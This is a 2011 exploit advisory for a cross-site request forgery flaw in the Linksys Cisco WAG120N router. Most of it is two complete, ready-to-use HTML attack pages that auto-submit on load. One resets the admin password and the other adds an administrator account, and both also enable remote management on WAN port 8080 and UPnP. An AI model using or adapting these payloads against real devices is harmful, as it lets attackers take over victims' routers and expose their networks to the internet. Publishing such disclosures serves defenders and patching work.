Linksys Cisco WAG120N CSRF Vulnerability

Published: 2011-02-26 CVE: N/A OSVDB-ID: 71032
  1. ----------------------------------------------------------------
  2. Hardware : Linksys Cisco Wag120n(And perhaps similar versions)
  3. Type of vunlnerability : CSRF ( Change Admin Password And Add User )
  4. Risk of use : High
  5. ----------------------------------------------------------------
  6. Producer Website : http://linksysbycisco.com
  7. ----------------------------------------------------------------
  8. Discovered by : Khashayar Fereidani
  9. Team Website : Http://IRCRASH.COM
  10. Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
  11. English Forums : Http://IRCRASH.COM/forums/
  12. Email : irancrash [ a t ] gmail [ d o t ] com
  13. ----------------------------------------------------------------
  14.  
  15. CSRF For Change Admin Password :
  16. #Use sysPasswd and sysConfirmPasswd to set new password
  17.  
  18. <body onLoad=javascript:document.form.submit()>
  19.  
  20. <form action="http://192.168.1.1/setup.cgi";
  21.  
  22. method="POST" name="form">
  23.  
  24. <input type="hidden" name="user_list" value="1">
  25.  
  26. <input type="hidden" name="h_user_list" value="1">
  27.  
  28. <input type="hidden" name="sysname" value="admin">
  29.  
  30. <input type="hidden" name="sysPasswd" value="password">
  31.  
  32. <input type="hidden" name="sysConfirmPasswd" value="password">
  33.  
  34. <input type="hidden" name="remote_management" value="enable">
  35. <input type="hidden" name="http_wanport" value="8080">
  36.  
  37. <input type="hidden" name="upnp_enable" value="enable">
  38.  
  39. <input type="hidden" name="wlan_enable" value="enable">
  40.  
  41. <input type="hidden" name="igmp_proxy_enable" value="enable">
  42.  
  43. <input type="hidden" name="save" value="Save+Settings">
  44.  
  45. <input type="hidden" name="h_pwset" value="yes">
  46.  
  47. <input type="hidden" name="sysname_changed" value="yes">
  48.  
  49. <input type="hidden" name="pwchanged" value="yes">
  50.  
  51. <input type="hidden" name="pass_is_default" value="false">
  52.  
  53. <input type="hidden" name="h_remote_management" value="enable">
  54.  
  55. <input type="hidden" name="pass_is_none" value="no">
  56.  
  57. <input type="hidden" name="h_upnp_enable" value="enable">
  58.  
  59. <input type="hidden" name="h_wlan_enable" value="enable">
  60.  
  61. <input type="hidden" name="h_igmp_proxy_enable" value="enable">
  62.  
  63. <input type="hidden" name="todo" value="save">
  64.  
  65. <input type="hidden" name="this_file" value="Administration.htm">
  66.  
  67. <input type="hidden" name="next_file" value="Administration.htm">
  68.  
  69. <input type="hidden" name="message" value="">
  70.  
  71. <input type="hidden" name="h_wps_cur_status" value="">
  72.  
  73. </form>
  74. </body>
  75. </html>
  76.  
  77. ----------------------------------------------------------------
  78.  
  79. CSRF For Add Administrator User:
  80. #Use sysPasswd and sysConfirmPasswd to set new password
  81. #if you add new user you should set pass_is_none=yes
  82.  
  83. <body onLoad=javascript:document.form.submit()>
  84.  
  85. <form action="http://192.168.1.1/setup.cgi";
  86.  
  87. method="POST" name="form">
  88.  
  89. <input type="hidden" name="user_list" value="2">
  90.  
  91. <input type="hidden" name="h_user_list" value="2">
  92.  
  93. <input type="hidden" name="sysname" value="ircrash">
  94.  
  95. <input type="hidden" name="sysPasswd" value="password">
  96.  
  97. <input type="hidden" name="sysConfirmPasswd" value="password">
  98.  
  99. <input type="hidden" name="remote_management" value="enable">
  100. <input type="hidden" name="http_wanport" value="8080">
  101.  
  102. <input type="hidden" name="upnp_enable" value="enable">
  103.  
  104. <input type="hidden" name="wlan_enable" value="enable">
  105.  
  106. <input type="hidden" name="igmp_proxy_enable" value="enable">
  107.  
  108. <input type="hidden" name="save" value="Save+Settings">
  109.  
  110. <input type="hidden" name="h_pwset" value="yes">
  111.  
  112. <input type="hidden" name="sysname_changed" value="yes">
  113.  
  114. <input type="hidden" name="pwchanged" value="yes">
  115.  
  116. <input type="hidden" name="pass_is_default" value="false">
  117.  
  118. <input type="hidden" name="h_remote_management" value="enable">
  119.  
  120. <input type="hidden" name="pass_is_none" value="yes">
  121.  
  122. <input type="hidden" name="h_upnp_enable" value="enable">
  123.  
  124. <input type="hidden" name="h_wlan_enable" value="enable">
  125.  
  126. <input type="hidden" name="h_igmp_proxy_enable" value="enable">
  127.  
  128. <input type="hidden" name="todo" value="save">
  129.  
  130. <input type="hidden" name="this_file" value="Administration.htm">
  131.  
  132. <input type="hidden" name="next_file" value="Administration.htm">
  133.  
  134. <input type="hidden" name="message" value="">
  135.  
  136. <input type="hidden" name="h_wps_cur_status" value="">
  137.  
  138. </form>
  139. </body>
  140. </html>
  141.  

Other Refrences

EXPLOIT-DB Advistory : http://www.exploit-db.com/exploits/16252/
SECLISTS Advistory : http://seclists.org/bugtraq/2011/Feb/252